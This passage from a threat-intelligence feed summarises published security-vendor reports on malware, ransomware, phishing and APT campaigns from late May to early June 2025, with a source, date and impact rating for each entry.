Summary:: Researchers from Cisco Talos have discovered a new malware campaign targeting a critical infrastructure organization in Ukraine by leveraging a data-wiping malware dubbed PathWiper which is distributed through a legitimate endpoint management tool. The attackers execute malicious console commands to run a VBScript which then delivers and activates PathWiper across multiple systems. Once deployed, the malware scan for all current and previously connected storage devices including network drives and permanently destroyed data by overwriting files and key components of the New Technology File System (NTFS) with random data. PathWiper’s tactics closely resemble with HermeticWiper, a destructive tool previously attributed to Russia’s Sandworm group. Researchers attribute this operation to a Russia-aligned state-sponsored threat actor with high confidence.

Source: https://blog.talosintelligence.com/pathwiper-targets-ukraine/

Intel Source:: Rapid7

Intel Name:: Hacktivist_Groups_Pivot_to_RaaS

Date of Scan:: 2025-06-08

Impact:: MEDIUM

Summary:: Rapid7 researchers have observed a significant shift among hacktivist groups such as FunkSec, KillSec, and GhostSec, transitioning to financially motivated cybercrime, specifically Ransomware-as-a-Service (RaaS) operations. Initially driven by political or social ideologies and engaging in DDoS and defacement attacks, these groups have increasingly adopted double extortion tactics—data exfiltration and encryption—leveraging RaaS models for profit. FunkSec, emerging in December 2024 and aligning with "Free Palestine," now targets diverse sectors globally using AI-generated FunkLocker ransomware. KillSec, active since 2021 and Russia-aligned, shifted to ransomware in October 2023, offering KillSecurity ransomware for Windows and ESXi. GhostSec, known since 2015 for #OpIsis, partnered with Stormous ransomware in July 2023, launched GhostLocker RaaS in October 2023, and announced a return to hacktivism in May 2024, leaving GhostLocker with Stormous.

Source: https://www.rapid7.com/blog/post/2025/06/03/from-ideology-to-financial-gain-exploring-the-convergence-from-hacktivism-to-cybercrime/

Intel Source:: ASEC

Intel Name:: NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool

Date of Scan:: 2025-06-08

Impact:: MEDIUM

Summary:: Researchers at ASEC have discovered a new ransomware campaign that disguises itself as a password-cracking tool to trick users into installing it. The malware is built with PyInstaller and masquerades as a brute-force utility, targeting users seeking unauthorized access tools. Upon execution, the tool simulates HTTP requests and password attempts but in the background, it secretly encrypts the user's files using strong AES-256 encryption in CFB mode. The ransomware avoids encrypting system critical directories such as Program Files and Windows. It renames affected files name by adding [.]NS1419 and drops a ransom note demanding $350 in Bitcoin. However, the ransomware does not store or send the decryption key, meaning there’s no way to recover the files even if the ransom is paid.

Source: https://asec.ahnlab.com/ko/88335/

Intel Source:: Threatdown

Intel Name:: Attackers_Use_SVG_Images_to_Steal_Credentials

Date of Scan:: 2025-06-08

Impact:: LOW

Summary:: Threatdown researchers have uncovered a phishing campaign leveraging SVG files embedded with obfuscated JavaScript to steal Microsoft credentials. The attack begins with a spoofed internal email sent to an employee at a logistics company that contains an SVG attachment. These files include obfuscated JavaScript that only runs when the document changes, using a MutationObserver to evade detection. The script decodes a hex-encoded payload and redirects the victim to a phishing site. When the user enters their password, attackers can steal it and potentially access the company’s internal systems, sensitive files or even deploy ransomware.

Source: https://www.threatdown.com/blog/criminals-smuggle-phishing-code-in-svg-images/

Intel Source:: cloudsek

Intel Name:: AMOS_Variant_Targets_Spectrum_Users_via_Clickfix

Date of Scan:: 2025-06-07

Impact:: LOW

Summary:: Researchers at CloudSEK have identified an active campaign by Russian-speaking threat actors distributing a new Atomic macOS Stealer (AMOS) variant, first detailed around June 4, 2025. The operation leverages typo-squatted domains impersonating the U.S. telecom provider Spectrum and employs the Clickfix social engineering method, tricking users into executing malicious code. Attackers deliver operating system-specific payloads: macOS users are served a shell script to harvest system passwords and deploy the AMOS stealer by bypassing native security controls, while Windows users receive PowerShell commands.

Source: https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers

Intel Source:: Fortinet

Intel Name:: Headerless_Malware_Uncovered

Date of Scan:: 2025-06-07

Impact:: LOW

Summary:: FortiGuard researchers have discovered a Remote Access Trojan (RAT) that infected a Windows system and remained active for several weeks without being detected. This malware runs directly in the system memory without a valid PE header which makes it hard for regular security tools to detect. It starts through scripts and PowerShell commands and runs under a process called dllhost.exe. It connects to its C2 server using a secure connection over port 443 and protect stolen data such as system info and JPEG screenshots by encrypting it with a custom XOR method. The malware can capture victim’s screen, receive remote commands and manipulate system services, showing it is designed for deep system access and long-term spying.

Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header

Intel Source:: K7 Security Labs

Intel Name:: ViperSoftX_Variant

Date of Scan:: 2025-06-07

Impact:: LOW

Summary:: Researchers from K7 Labs have uncovered the ViperSoftX malware targeting Windows system through cracked software distributed via torrent platforms. The malware is primarily used to deliver information stealers and cryptocurrency hijackers. Upon execution, it leverages hidden PowerShell loader to install and execute second payload disguised as a legitimate DLL. This DLL contains a Lua script engine that runs hidden Lua scripts stored inside an encrypted ZIP file. Its primary objective is to steal personal information and cryptocurrency, especially by watching the clipboard for wallet addresses to hijack.

Source: https://labs.k7computing.com/index.php/in-depth-analysis-of-a-2025-vipersoftx-variant/

Intel Source:: Cisco Talos

Intel Name:: Malware_Disguised_as_AI_Tool_Installers

Date of Scan:: 2025-06-06

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have identified a significant trend where cybercriminals disguise malware as popular AI tools to trick users into downloading them. These fake AI installers are being used to spread three different threats such as CyberLock ransomware, Lucky_Gh0$t ransomware and a newly discovered malware called Numero. The attackers are mainly targeting people and businesses in technology, marketing, and B2B sales. To lure victims, the attackers use tactics like search engine manipulation and fake messages on platforms like Telegram and social media. CyberLock is ransomware that encrypts files and demands $50,000 in Monero, falsely claiming the money supports humanitarian causes. On the other hand, Lucky_Gh0$t is a Yashma ransomware variant, hidden in a fake ChatGPT installer and uses Microsoft AI tools to look legitimate and avoid detection. The third threat, Numero is a destructive malware that disguised as an AI video creation tool but makes Windows systems disable by replacing text and buttons with random numbers.

Source: https://blog.talosintelligence.com/fake-ai-tool-installers/

Intel Source:: Socket

Intel Name:: Malicious_NPM_Crypto_Wallet_Drainers

Date of Scan:: 2025-06-06

Impact:: LOW

Summary:: Researchers at Socket have identified four malicious npm packages designed to drain Ethereum and BSC cryptocurrency wallets. These packages, created by an actor named @crypto-exploit (registered with a Russian webmail address) between three to four years ago, collectively amassed over 2,100 downloads. The malware, embedded within packages like pancake_uniswap_validators_utils_snipe and env-process, uses obfuscated JavaScript that relies on environment variables for wallet private keys and then attempts to transfer 80-85% of the victim's wallet balance to a threat actor-controlled address. This known tactic aims for stealth and persistence by leaving some funds for gas fees.

Source: https://socket.dev/blog/malicious-npm-packages-target-bsc-and-ethereum

Intel Source:: ISC.SANS

Intel Name:: Fake_Zoom_Client_Delivers_RAT

Date of Scan:: 2025-06-06

Impact:: LOW

Summary:: Researchers at ISC.SANS have found a campaign distributing malware through fake Zoom client updates, observed around June 4, 2025. Attackers lure victims with phishing emails containing fake Zoom meeting invitations. Clicking the embedded link directs users to a webpage prompting a Zoom client update, which, if downloaded, delivers an executable ("Session.ClientSetup.exe"). This initial payload acts as a downloader, deploying an MSI package that installs ScreenConnect, a legitimate remote access tool, configured for malicious control by the attackers and establishing persistence as a service. The primary objective appears to be gaining unauthorized remote access to victim systems. This tactic leverages the widespread reliance on collaborative tools, particularly since the shift to remote work, posing a significant risk of unauthorized access and potential follow-on attacks.

Source: https://isc.sans.edu/diary/rss/32014

Intel Source:: Cyfirma

Intel Name:: DuplexSpy_RAT_Target_Window_Users

Date of Scan:: 2025-06-06

Impact:: LOW

Summary:: CYFIRMA researchers have identified a new malware called DuplexSpy RAT that targets Windows systems. It was originally released publicly on GitHub by a user named ISSAC/iss4cfOng for educational purposes but now cybercriminals have been started using it. DuplexSpy allows attackers to fully control infected machine including logging keystrokes, recording screens, turning on webcams and microphones, running remote commands and even moving the mouse. It hides itself by copying files to startup folders, changing registry settings, injecting code into other programs and using encryption to avoid detection. It can also disguise itself as a legitimate Windows update and shuts down security software to stay hidden.

Source: https://www.cyfirma.com/research/duplexspy-rat-stealthy-windows-malware-enabling-full-remote-control-and-surveillance/

Intel Source:: Sysdig

Intel Name:: AI_Tool_Misconfig_Exploited_for_Malicious_Payload

Date of Scan:: 2025-06-05

Impact:: MEDIUM

Summary:: The Sysdig Threat Research Team have reported an incident where a threat actor exploited a misconfigured, internet-exposed Open WebUI instance to deploy an AI-generated Python payload. This payload targeted both Linux and Windows systems, downloading T-Rex and XMRig cryptominers for Monero and Kawpow, establishing persistence via systemd services, and using a Discord webhook for C2. The financially motivated attack leveraged uncommon defense evasion tools like processhider and argvhider (an LD_PRELOAD technique to hide process arguments) on Linux. The Windows variant was more sophisticated, deploying a Java-based loader (application-ref.jar) which in turn executed secondary malicious JARs containing infostealers targeting Chrome extensions and Discord tokens, and employed multiple DLLs for XOR decoding and sandbox evasion.

Source: https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/

Intel Source:: Any.Run

Intel Name:: Lazarus_Stealer_Targets_Professionals

Date of Scan:: 2025-06-05

Impact:: LOW

Summary:: Researchers at ANY.RUN have found OtterCookie, a new JavaScript-based stealer malware attributed to the North Korean Lazarus Group, targeting finance and technology professionals. First observed in a campaign around June 2025, attackers employ social engineering, often through fake job offers or freelance bug fix tasks on platforms like LinkedIn, to deliver what appears to be legitimate Node.js code hosted in a Bitbucket repository. The malware's novelty lies in its execution method: an intentionally flawed piece of code triggers an error handler that fetches and executes a heavily obfuscated JavaScript payload from an external API, reportedly hosted in Finland.

Source: https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

Intel Source:: Gi7w0rm (Medium)

Intel Name:: HuluCaptcha_CAPTCHA_Deploys_Malware

Date of Scan:: 2025-06-04

Impact:: LOW

Summary:: Researchers from Gi7w0rm have uncovered a new malicious campaign called HuluCaptcha which uses fake CAPTCHA pages to distribute malware such as Lumma Stealer, Aurotun Stealer and Donut Injector. The attackers are compromising legitimate websites such as the German Association for International Law and the Los Angeles Caregiver Resource Center by injecting malicious JavaScript that redirects users to fake CAPTCHA screens designed to resemble Cloudflare. These deceptive pages trick users into executing malicious commands via the Windows Run dialog which installs malware. The campaign also includes tools for victim tracking, customized PowerShell payload generation and indications of an affiliate tracking system aimed at scaling the operation.

Source: https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d

Intel Source:: ASEC

Intel Name:: ViperSoftX_Targeting_Cryptocurrency_Users

Date of Scan:: 2025-06-03

Impact:: LOW

Summary:: ASEC researchers have observed the ViperSoftX threat actor targeting cryptocurrency users across the globe with recent attacks in Korea. This multi-stage malware campaign has been active for several years, aiming for financial gain by stealing cryptocurrency-related information and hijacking transactions. ViperSoftX gains initial access through pirated software or malicious torrents files. Once inside a system, it establishes persistence via scheduled tasks and obfuscated PowerShell scripts. The malware then deploys malicious tools including downloaders, information stealers like TesseractStealer, clipboard manipulators (ClipBanker) to change wallet addresses and RATs such as Quasar RAT and PureHVNC, communicating with C2 servers over HTTP and DNS. It can also monitor clipboard activity for cryptocurrency wallet addresses and BIP39 recovery phrases, exfiltrating browser data and system information and executing arbitrary commands from the attacker.

Source: https://asec.ahnlab.com/ko/88265/

Intel Source:: Wiz.io

Intel Name:: JINX_0132_DevOps_Cryptojacking_Campaign

Date of Scan:: 2025-06-03

Impact:: LOW

Summary:: Researchers at Wiz have identified a widespread cryptojacking campaign, attributed to the threat actor JINX-0132, targeting publicly accessible and misconfigured DevOps tools such as HashiCorp Nomad, Consul, Docker API, and Gitea, including instances in major cloud environments. Active as of June 2025, JINX-0132 exploits known vulnerabilities and insecure default settings—like Nomad's job creation or Consul's health checks—to achieve remote code execution and deploy the XMRig Monero miner for financial gain.

Source: https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign

Intel Source:: SOC Radar

Intel Name:: NightSpire_Ransomware

Date of Scan:: 2025-06-03

Impact:: MEDIUM

Summary:: Researchers from Soc Radar have uncovered a new financially motivated ransomware group called NightSpire that emerged in early 2025. The group employ a double extortion technique in which they steal sensitive data from victims and threaten to publish it on their data leak site if the ransom is not paid. NightSpire primarily targets small to medium-sized organisation including Technology, IT Services, Financial Services, Manufacturing, Construction, Education and Healthcare sectors across the U.S., Taiwan, Hong Kong, Egypt and several European nations. The group gain initial access by exploiting known vulnerabilities in VPNs, firewalls, or outdated web servers. Once inside, they use legitimate system tools such as PowerShell or PsExec to move laterally, steal credentials and escalate privileges. Before deploying ransomware, they exfiltrate data to attacker-controlled servers using tools like Rclone or MEGA. NightSpire leverages secure channels like ProtonMail or Telegram to communicates with victims.

Source: https://socradar.io/dark-web-profile-nightspire-ransomware/

Intel Source:: CISA

Intel Name:: APT_28_Targeting_Western_Logistics_and_Technology_Entities

Date of Scan:: 2025-06-03

Impact:: MEDIUM

Summary:: A Joint advisory has been issued by CISA, NSA, FBI and international partners warns warns that the GRU’s Unit 26165 also known as APT28 or Fancy Bear has been conducting a long-running cyber espionage campaign targeting Western logistics and technology companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine. The threat actor employs multiple tactics and technique to gain initial access including password spraying, spearphishing, exploiting vulnerabilities (like Outlook, Roundcube, and WinRAR) and abusing SOHO devices and VPNs. More recently, they have expanded their activity to include targeting internet-connected cameras at Ukraine and bordering NATO countries to monitor aid shipments. Once inside a system, the threat actor conduct reconnaissance and often use tools like Impacket, PsExec, Certipy, and ADExplorer for lateral movement and data exfiltration, focusing on sensitive information related to aid shipments.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a

Intel Source:: CYFIRMA

Intel Name:: Lyrix_Ransomware_Targeting_Windows

Date of Scan:: 2025-06-02

Impact:: MEDIUM

Summary:: CYFIRMA researchers have identified Lyrix Ransomware, a Python-based malware compiled with PyInstaller, targeting Windows operating systems. First observed on April 20, 2025, Lyrix employs strong AES encryption, appends a '.02dq34jROu' extension to encrypted files, and utilizes advanced evasion techniques such as anti-VM checks (via VirtualProtect) and process manipulation (GetCurrentProcess, TerminateProcess). The financially motivated attackers issue ransom demands, threaten to leak stolen data from user directories like Downloads and Documents, and attempt to cripple system recovery by deleting Volume Shadow Copies and disabling WinRE. The malware's discovery on underground forums and the ProtonMail contact address creation in April 2025 indicate recent actor activity.

Source: https://www.cyfirma.com/research/lyrix-ransomware/

Intel Source:: BitMEX

Intel Name:: Lazarus_Targeting_Crypto_via_Phishing

Date of Scan:: 2025-06-02

Impact:: MEDIUM

Summary:: BitMEX researchers have analyzed the Lazarus Group, linked to the North Korean government, continues its financially motivated campaigns against the cryptocurrency sector. Threat actors employ initial phishing and social engineering, such as recent LinkedIn pretexts for fake web3 project collaborations, to trick victims into executing malicious code often hosted in private GitHub repositories. This initial payload, as detailed by BitMEX, exfiltrates victim metadata to a misconfigured Supabase instance and deploys a second-stage JavaScript credential stealer, resembling "BeaverTail," aimed at pilfering browser data and cryptocurrency wallet access.

Source: https://blog.bitmex.com/bitmex-busts-lazarus-group/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APT_C_53_Military_Themed_LNK_Attacks

Date of Scan:: 2025-06-02

Impact:: MEDIUM

Summary:: The 360 Advanced Threat Research Institute have recently captured VBScript samples attributed to APT-C-53 (Gamaredon), an advanced persistent threat group active since 2013 known for targeting government and military entities for intelligence theft. This campaign employs highly obfuscated VBS scripts and malicious LNK shortcut files, using military intelligence themes as bait to entice users into executing payloads via social engineering. The attackers utilize a phased deployment mechanism, achieving persistence through infected user files, registry modifications, and scheduled tasks, ultimately aiming to exfiltrate sensitive information. Forged HTTP request headers, including User-Agent and Referer fields referencing Ukrainian government domains, are used for command-and-control communication, which involves Base64 encoded data.

Source: https://mp.weixin.qq.com/s/sVc2dLNJwbpgEzBXkFyBRw

Intel Source:: CERT-AGID

Intel Name:: New_AsyncRAT_Campaign_Targets_Italian_Users

Date of Scan:: 2025-06-01

Impact:: LOW

Summary:: CERT-AGID researchers have uncovered a phishing campaign targeting users in Italy leveraging AsyncRAT malware. The attack starts with an English-language email impersonating the legitimate company Arabian Construction Co claiming the recipient is being considered as a potential supplier and invites them to view a file. However, Instead of an attachment, the email includes a Box.com link to download a TAR file containing a hidden JavaScript file. When executed, the script runs PowerShell to download a DLL from Aruba Drive. The DLL checks if it is running in a virtual machine then downloads and executes AsyncRAT. This malware allows attackers to take control of infected machines, steal data and run commands remotely.

Source: https://cert-agid.gov.it/news/asyncrat-distribuito-in-italia-tramite-componenti-steganografici/

Intel Source:: Sophos

Intel Name:: DragonForce_Exploits_SimpleHelp_for_MSP_Attacks

Date of Scan:: 2025-06-01

Impact:: MEDIUM

Summary:: Sophos researchers have uncovered that DragonForce ransomware operators are exploiting a chain of vulnerabilities (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) in SimpleHelp remote monitoring and management (RMM) software, released in January 2025. The attackers target Managed Service Providers (MSPs) to gain access to their environments and those of their clients. In one investigated case, the threat actors compromised an MSP’s SimpleHelp instance, mapped connected customer environments, and deployed DragonForce ransomware across multiple systems. They also exfiltrated sensitive data to enable double extortion tactics. Active since mid-2023, DragonForce operates as a Ransomware-as-a-Service (RaaS) platform with a growing affiliate base, including members linked to groups like Scattered Spider, presenting a serious supply chain threat to organizations reliant on MSPs.

Source: https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/

Intel Source:: Microsoft

Intel Name:: Void_Blizzard_Espionage_Targets_Critical_Sectors

Date of Scan:: 2025-06-01

Impact:: HIGH

Summary:: Microsoft researchers have have disclosed details Void Blizzard (also LAUNDRY BEAR), a Russia-affiliated actor active since at least April 2024, conducting cyberespionage operations against organizations crucial to Russian government objectives, primarily in Europe and North America. Targets include government, defense, transportation, media, NGOs, and healthcare sectors, with a disproportionate focus on NATO member states and Ukraine. Void Blizzard initially gained access by using stolen credentials, likely procured from infostealer ecosystems, to access Exchange and SharePoint Online for large-scale email and file exfiltration. As of April 2025, the actor evolved tactics to include adversary-in-the-middle (AitM) spear phishing, using typosquatted domains and the Evilginx framework to spoof Microsoft Entra authentication and steal credentials and session cookies.

Source: https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/

Intel Source:: Wordfence

Intel Name:: Stealthy_WooCommerce_Formjacking_Malware

Date of Scan:: 2025-05-31

Impact:: LOW

Summary:: The Wordfence researchers have identified a sophisticated formjacking malware targeting e-commerce sites using WooCommerce. Active since at least April 2025, this malware injects a convincing, fake payment form into the checkout process to steal sensitive customer data, including full card details and personal information. Attackers achieve initial access likely through compromised WordPress administrator accounts, then inject the malicious JavaScript via custom code plugins. The malware stealthily captures data by continuously monitoring billing fields and storing it in the browser's localStorage for persistence across sessions and resilience against network interruptions. Upon the customer clicking "Place Order," the script exfiltrates the collected data to a remote command-and-control server using the navigator.sendBeacon() method, which avoids user awareness and common detection triggers.

Source: https://www.wordfence.com/blog/2025/05/sophisticated-stealthy-formjacking-malware-targets-e-commerce-checkout-pages/

Intel Source:: CERT-AGID

Intel Name:: Fake_Agenzia_Entrate_Refund_Scam

Date of Scan:: 2025-05-31

Impact:: LOW

Summary:: CERT-AGID researchers have uncovered a phishing campaign impersonating Italy’s Revenue Agency (Agenzia delle Entrate), in which threat actors distribute fake refund emails to trick recipients into entering personal and credit card information on a fraudulent website. The Ministry of Economy and Finance (MEF) has been notified, and efforts are underway to take down the malicious domain.

Source: https://cert-agid.gov.it/wp-content/uploads/2025/05/phishing_AdE_2.json

Intel Source:: LevelBlue

Intel Name:: MSHTA_LOLBin_Delivers_Obfuscated_Infostealer

Date of Scan:: 2025-05-31

Impact:: MEDIUM

Summary:: According to LevelBlue's analysis, published May 27, 2025, details an emerging threat involving multi-stage malware delivery initiated by mshta.exe, a native Windows LOLBin. Attackers leverage MSHTA to fetch an initially disguised .tmp file, hosted on cloud infrastructure like Alibaba Cloud Object Storage, which contains heavily obfuscated VBScript. This script employs techniques like XOR and Base64 encoding to deobfuscate and execute subsequent PowerShell payloads via WMI, ultimately leading to the deployment of a sophisticated infostealer.

Source: https://levelblue.com/blogs/security-essentials/hunting-malware-with-mshta-and-cyberchef

Intel Source:: PolySwarm

Intel Name:: Fancy_Bear_SpyPress_XSS_Campaign

Date of Scan:: 2025-05-30

Impact:: MEDIUM

Summary:: PolySwarm researchers have uncovered Operation RoundPress, an ongoing cyberespionage campaign attributed to the Russia-aligned threat group Fancy Bear, active since 2023 and expanding through 2024. The operation leverages SpyPress, a malicious JavaScript payload delivered through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities, including zero-days like CVE-2024-11182 in MDaemon—within webmail platforms such as Roundcube, Horde, and Zimbra. The campaign primarily targets Ukrainian government agencies, Eastern European defense contractors, and government organizations across Africa, the EU, and South America.

Source: https://blog.polyswarm.io/fancy-bears-spypress-malware

Intel Source:: Qianxin Threat Intelligence Center

Intel Name:: Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra

Date of Scan:: 2025-05-30

Impact:: MEDIUM

Summary:: Researchers at Qianxin have uncovered substantial overlaps in infrastructure and tooling between two advanced persistent threat (APT) groups: Maha Grass (APT-Q-36) and Brain Worm (APT-Q-38). Both groups are active in cyber espionage operations targeting organizations across South Asia and the broader Asian region. Since late February 2025, Brain Worm has been observed using a malware-hosting domain that was also recently associated with a Spyder downloader variant deployed by Maha Grass. A notable connection between the two groups is the use of the same digital signature "Ebo Sky Tech Inc" on malware samples, but applied on different dates: January 28 for Brain Worm and February 16 for Maha Grass. Both groups rely on spear-phishing attacks using malicious PowerPoint files embedded with VBA macros. These macros deliver an initial payload that subsequently downloads additional components, including DLL files and the Spyder downloader. The Spyder variant employed by both APTs features XOR-encrypted configurations, establishes persistence via scheduled tasks, remaps system DLLs, and exfiltrates data using Base64-encoded JSON payloads embedded in custom HTTP headers. To evade detection, the malware disguises its command-and-control (C2) traffic as legitimate network communication, spoofing well-known services such as GitHub.

Source: https://mp.weixin.qq.com/s/pJTPeK1Cam5n4RUElWzb2Q

Intel Source:: Elastic Security Labs

Intel Name:: ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor

Date of Scan:: 2025-05-30

Impact:: MEDIUM

Summary:: Researchers from Elastic Security Labs have discovered DOUBLELOADER, a newly identified backdoor malware often found in conjunction with the RHADAMANTHYS infostealer. This malware duo is notably protected by the ALCATRAZ open-source obfuscator, which has been in use since January 2023 by both cybercriminal groups and APT actors. DOUBLELOADER has been active since at least December 2024 and leverages ALCATRAZ to complicate binary analysis and extend its operational lifespan. DOUBLELOADER performs direct system calls for tasks such as injecting code into the explorer.exe process, gathering host system information, and communicating with a hardcoded command-and-control server for updates. The ALCATRAZ obfuscator enhances evasion by applying multiple layers of protection, including control flow flattening, instruction mutation, constant unfolding, LEA constant hiding, anti-disassembly techniques, and entrypoint obfuscation. These obfuscation methods are frequently embedded within a custom PE section named .0Dev.

Source: https://www.elastic.co/security-labs/deobfuscating-alcatraz

Intel Source:: Sekoia

Intel Name:: Mimo_Exploits_Craft_CMS_for_Cryptomining

Date of Scan:: 2025-05-30

Impact:: LOW

Summary:: Researchers at Sekoia have identified a group called Mimo that has been active since at least March 2022, exploiting a newly disclosed vulnerability (CVE-2025-32432) in the Craft content management system to break into servers. After gaining access, the attackers, believed to be based in Turkey install a backdoor that allows remote access to a compromised server and run a script named 4l4md4r.sh to download a program written in Go language. This program installs both a cryptominers called XMRig and a tool called IPRoyal, used to exploit the victim's internet bandwidth. They also use advanced techniques like LD_PRELOAD hijacking which helps hide their malicious activity on the system.

Source: https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/

Intel Source:: Picussecurity

Intel Name:: Chihuahua_Infostealer

Date of Scan:: 2025-05-29

Impact:: LOW

Summary:: Researchers at Picus Security have uncovered a .NET-based malware called Chihuahua Infostealer which emerged in April 2025 and targets browser credentials and cryptocurrency wallet data. The malware, likely created by Russian-speaking developers begins with social engineering that tricks victims into executing a malicious PowerShell script often delivered through trusted platforms like Google Drive. This script starts a multi-stage infection chain involving a Base64-encoded payload, followed by second-stage script that sets up scheduled task for persistence and further payload execution. The final .NET payload downloaded from OneDrive which runs directly in memory to evade detection. The infection chain steal data from various browsers and cryptocurrency wallet. The stolen data is encrypted and exfiltrated over HTTPS, while local evidence of the attack is erased.

Source: https://www.picussecurity.com/resource/blog/chihuahua-stealer-malware-targets-browser-and-wallet-data

Intel Source:: ESET Research

Intel Name:: Danabot_MaaS_Disruption_and_Analysis

Date of Scan:: 2025-05-29

Impact:: MEDIUM

Summary:: According to ESET Research, the Danabot Malware-as-a-Service (MaaS) operation, an infostealer and banking trojan active since 2018, recently disrupted by a multinational law enforcement effort, Operation Endgame, in May 2025. The Danabot group, including individuals identified as JimmBee and Onix, provided affiliates with tools to steal financial data, deploy secondary malware like ransomware, and conduct DDoS attacks against global victims, with early campaigns targeting Australia and Poland. Attackers distributed Danabot via spam, malicious Google Ads, and deceptive websites tricking users into executing malware on Windows systems.

Source: https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/

Intel Source:: Zscaler

Intel Name:: Operation_Endgame_2_0

Date of Scan:: 2025-05-29

Impact:: MEDIUM

Summary:: Zscaler researchers have observed that law enforcement agencies have released information about an ongoing coordinated effort under “Operation Endgame”, a Joint campaign aimed at seizing and taking down DanaBot infrastructure, primarily within the United States. This operations has already disrupted several malware families like SmokeLoader, IcedID, Pikabot, and Bumblebee, and now includes actions against DanaBot. It is sold on underground forums as a Malware-as-a-Service (MaaS). Its primary functions include stealing sensitive data, injecting malicious content into web browsers and deploying additional malware such as ransomware and remote access trojans. Notably, DanaBot can capture keystrokes, take screenshots, record the screen, and even access the victim’s system remotely. DanaBot's communications with C2 servers use strong encryption and utilize Tor to anonymize and secure these connections.

Source: https://www.zscaler.com/blogs/security-research/operation-endgame-2-0-danabusted

Intel Source:: Seqrite

Intel Name:: Operation_Sindoor

Date of Scan:: 2025-05-28

Impact:: LOW

Summary:: Researchers from Seqrite Labs have uncovered multiple cyber attack linked to Operation Sindoor, involving both State sponsored group and hacktivist group. The campaign is associated with Pakistan-aligned threat groups APT36 and Sidecopy and targeted critical Indian sectors such as defense, government IT systems, healthcare, telecom, and education. It involved spear phishing with malicious documents (macros, shortcuts, scripts) that deployed the Ares malware for espionage while hacktivist groups launched DDoS attacks, defaced websites, and leaked stolen data. The operation also leveraged spoofed domains mimicking military and government entities to spread false information and cause disruption.

Source: https://www.seqrite.com/blog/operation-sindoor-anatomy-of-a-digital-siege/

Intel Source:: Recorded Future

Intel Name:: TAG_110_Targets_Tajikistan_Entities

Date of Scan:: 2025-05-28

Impact:: MEDIUM

Summary:: Researchers at Insikt group has uncovered a phishing campaign conducted by Russian threat actor TAG-110, targeting government, educational, and research institutions in Tajikistan. In this campaign, threat actor has changed tactics by leveraging macro-enabled Word template files (.dotm) to gain initial access and persistence insteal of deploying HTA-based payload named HATVIBE. These VBA enabled templates are embedded within government themed documents. When receiptent open the document, the malware copies itself to the Word STARTUP folder, allowing it to run automatically every time Word is opened. It collects system information and send it to C2 server. This campaign focused on intelligence gathering related to government operations, military affairs, and political events such as elections to support Russian strategic interests in Central Asia.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2025-0522.pdf

Intel Source:: EclecticIQ

Intel Name:: Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability

Date of Scan:: 2025-05-28

Impact:: MEDIUM

Summary:: EclecticIQ researcher have identified that China-nexus threat actor called UNC5221 is actively exploiting two critical Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities (CVE-2025-4427 and CVE-2025-4428). The attackers are targeting internet-facing EPMM systems across critical sectors in Europe, North America, and the Asia-Pacific. They gain initial access through an unauthenticated remote code execution using Java Reflection to execute commands. Post-exploitation, they deploy the KrustyLoader malware which downloads a hidden second-stage payload from AWS storage. This malware decrypts and injects itself directly into system memory to maintain long-term access. The threat actors then leverage MySQL credentials to access the EPMM database and exfiltrating sensitive data including authentication credentials, device details and Office 365 tokens. They also use a tool called FRP (Fast Reverse Proxy) for network reconnaissance and lateral movement.

Source: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability

Intel Source:: motuariki (X)

Intel Name:: Amos_Stealer_Targeting_macOS_Users

Date of Scan:: 2025-05-27

Impact:: LOW

Summary:: Security researcher motuariki have disclosed additional Command and Control (C2) infrastructure and sample hashes associated with the Amos Stealer, a known macOS malware. The shared C2 endpoint was listed alongside other similar IP-based C2s. This ongoing activity signifies a persistent threat from Amos Stealer targeting macOS users for credential and data theft.

Source: https://x.com/motuariki_/status/1924330564880159165

Intel Source:: ASEC

Intel Name:: APT_Spear_Phishing_Surge_in_Korea

Date of Scan:: 2025-05-27

Impact:: LOW

Summary:: ASEC researchers have discovered an increase in Advanced Persistent Threat (APT) attacks in South Korea during April 2025, with spear phishing identified as the most common infiltration method. Targeted phishing attacks use thorough reconnaissance, spoofed sender addresses, and malware attachments or links to trick receivers. AhnLab identified a particular variation involving LNK files, in which attackers distributed CAB-compressed malicious scripts encoded in LNK files carrying PowerShell commands. When launched, these scripts can extract fake documents, leak system information, and install other malware on the victim's computer.

Source: https://asec.ahnlab.com/en/87945/

Intel Source:: Fortra

Intel Name:: Phishing_Campaign_Abuses_jsDelivr

Date of Scan:: 2025-05-26

Impact:: LOW

Summary:: Researchers at Fortra have identified a phishing campaign targeting Microsoft O365 users. The attack initiate with the phishing email containing .htm file that hides encrypted JavaScript code using AES encryption. Once decrypted, the script connects to a fake open-source package on npm which is hosted on a CDN like jsDelivr. This package then generates customized phishing links that include victim’s email address. These links redirect the victim through multiple websites before landing on a fake office 365 login page to steal their credentials.

Source: https://www.fortra.com/blog/threat-analysis-malicious-npm-package-leveraged-o365-phishing-attack

Intel Source:: CYJAX

Intel Name:: Bumblebee_Spread_via_Bing_SEO_Poisoning

